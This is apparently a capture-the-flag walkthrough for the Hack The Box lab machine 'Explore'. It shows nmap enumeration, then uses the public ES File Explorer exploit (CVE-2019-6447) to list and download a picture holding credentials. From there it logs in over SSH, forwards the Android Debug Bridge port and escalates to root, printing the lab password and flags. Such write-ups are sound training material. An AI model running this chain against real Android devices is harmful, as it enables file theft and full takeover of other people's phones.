Explore

Enumeration

As usual, let's start with nmap:

nmap -sV -Pn -p- 10.10.10.247

I googled the following:

• port 5555 android --> adb (android debug bridge)

• port 5977 android --> found out there is android vulnerability in ES file explorer - CVE-2019-6447. Basically this vulnerability allow attackers on the same network to execute applications and read files on the android!

From your attackers' machine do the following:

Go to exploit database https://www.exploit-db.com/

Click on Search EDB

and type 2019-6447 in the CVE field

Click on the exploit

Download the exploit

Go to your Downloads folder:

cd Downloads

ls

Let's try to run this exploit using:

python3 50070.py

Looks like we need to add a command followed by the IP. If we go back to the exploit on the exploit-db website, it tells us we can use the command listPics to list all the pictures on the android so let's try that:

python3 50070.py listPics 10.10.10.247

Looks like there is an interesting picture called creds.jpg

Let's try to get this file using getFile:

python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

The file has been downloaded on our machine as out.dat, let's check it out:

When we open the file we see the following:

Looks like a password for username kristi:

Kr1sT!5h@Rp3xPl0r3!

We can see from the nmap that port 2222 is open, which is ssh. So let's try to ssh using these credentials:

ssh kristi@10.10.10.247 -p 2222

Type yes and press enter

enter the password we just found

Kr1sT!5h@Rp3xPl0r3!

We are in!

id

ls

cd sdcard

ls

cat user.txt

f32017174c7c7e8f50c6da52891ae250

Congratulations! You got the user flag!

cd ..

ls

Let's find out on which port the android is listening by typing:

netstat -tulpn | grep LISTEN

We can see port 5555 is listening.

Port forwarding

What is local port forwarding:

Local port forwarding is configured using the -L option:

    ssh -L     5555:machine2:5555    machine1

This opens a connection on the machine1 and forwards any connection to port 5555 on machine1 to port 5555 on machine2

For our case let's use it and type:

    ssh -L     5555:localhost:5555       kristi@IP -p 2222

This opens a connection to htb target machine (explore machine), and forwards any connection to port 5555 on the machine to port 5555 on my localhost (VM)

We know that our target (htb machine) is listening on port 5555 (netstat told us)

Open a new command prompt on your VM

ssh -L     5555:localhost:5555       kristi@10.10.10.247 -p 2222

Enter the password we found earlier

Kr1sT!5h@Rp3xPl0r3!

adb

ADB - Android Debug Bridge is a command line tool that allow you to communicate with an android device. It is used by developers mainly to install or debug apps, and it also comes with a unix shell that can be used to run several commands on the device.

An Android device emulator is just a virtual device that runs on your computer that allow you to develop and test your android app without using a physical android device.

Open a new command prompt on your VM

sudo apt install adb

Press Y to continue

sudo apt-get update

sudo apt install adb

press Y to continue.

This time it worked, we have installed adb successfully.

adb devices

adb connect localhost:5555

adb devices

adb shell

adb localhost shell

adb -s localhost shell

whoami

su

whoami

we are now root!

ls 

cd data

ls

cat root.txt

f04fc82b6d49b41c9b08982be59338c5

Congratulations! You got the root flag!